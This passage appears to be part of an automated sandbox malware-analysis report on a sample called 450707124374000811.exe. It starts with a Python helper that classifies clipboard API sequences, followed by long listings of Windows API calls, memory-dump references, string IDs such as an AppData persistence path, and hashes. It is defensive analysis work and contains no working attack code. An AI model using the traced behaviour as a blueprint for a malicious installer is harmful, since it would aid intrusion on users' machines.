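    sequence among the function's direct calls (subcall lines are ignored).  Returns
    (format_name, source) or None, where `source` is the window message used to fill the
    buffer while it is GlobalLock'ed; that distinguishes a copy-to-clipboard of UI text
    from code that reads or replaces clipboard contents for other reasons."""
    step, fmt, source, locked = 0, None, None, False
    for c in (c for c in calls if c.subcall_of is None):
        if c.api == "GlobalLock":
            locked = True
        elif c.api == "GlobalUnlock":
            locked = False
        elif c.api == "SendMessageW" and locked:
            source = WINDOW_MESSAGES.get(c.arg_int(1), "unknown message")
        if step < len(CLIPBOARD_WRITE) and c.api == CLIPBOARD_WRITE[step]:
            if c.api == "SetClipboardData":
                fmt = CLIPBOARD_FORMATS.get(c.arg_int(0), "unknown format")
            step += 1
    return (fmt, source) if step == len(CLIPBOARD_WRITE) else None


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(("  [sub] " if c.subcall_of is not None else "  ") + describe(c))
    print("clipboard write:", find_clipboard_write(parsed))
```

Run against the listing above, the helper reports a CF_UNICODETEXT write whose buffer is filled by LVM_GETITEMTEXTW between GlobalLock and GlobalUnlock, i.e. this function copies list-view text to the clipboard rather than reading from it; the signature name should be read with that in mind. The regex deliberately tolerates the report's two argument styles (`(args), ref:` and the bare `API.MODULE ref:` form seen for EmptyClipboard and CloseClipboard) and leaves `?` and string arguments untouched, so it can be pointed at the whole section unchanged.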
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                              • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                                • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                                • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                              • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                                • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                              • API String ID: 2624150263-2308679604
                                                              • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                              • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                              • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                              • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                              APIs
                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                              • GlobalFree.KERNEL32(?), ref: 10001D83
                                                              • GlobalFree.KERNEL32(?), ref: 10001D88
                                                              • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                              • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$lstrcpy$Alloc
                                                              • String ID:
                                                              • API String ID: 4227406936-0
                                                              • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                              • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                              • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                              • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                              APIs
                                                              • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 004021BD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                              • API String ID: 542301482-4074717334
                                                              • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                              • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                              • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                              • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: p!C$p!C
                                                              • API String ID: 0-3125587631
                                                              • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                              • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                              • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                              • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                              • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                              • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                              • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                              • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                              • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                              • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                              • GetSysColor.USER32(?), ref: 00404494
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                              • lstrlenW.KERNEL32(?), ref: 004044B5
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                              • SendMessageW.USER32(00000000), ref: 00404537
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                              • SetCursor.USER32(00000000), ref: 004045B6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                              • SetCursor.USER32(00000000), ref: 004045D2
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: +C@$Call$N
                                                              • API String ID: 3103080414-3697844480
                                                              • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                              • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                              • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                              • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                              • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                              • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                              • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                              • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                              • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                              • wsprintfA.USER32 ref: 00405F4D
                                                              • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                              • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]
                                                              • API String ID: 2171350718-461813615
                                                              • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                              • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                              • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                              • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-416954956
                                                              • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                              • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                              • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                              • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                              • GetSysColor.USER32(00000000), ref: 004042B7
                                                              • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                              • SetBkMode.GDI32(?,?), ref: 004042CF
                                                              • GetSysColor.USER32(?), ref: 004042E2
                                                              • SetBkColor.GDI32(?,?), ref: 004042F2
                                                              • DeleteObject.GDI32(?), ref: 0040430C
                                                              • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                              • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                              • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                              APIs
                                                              • lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                              • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                              • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                              • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
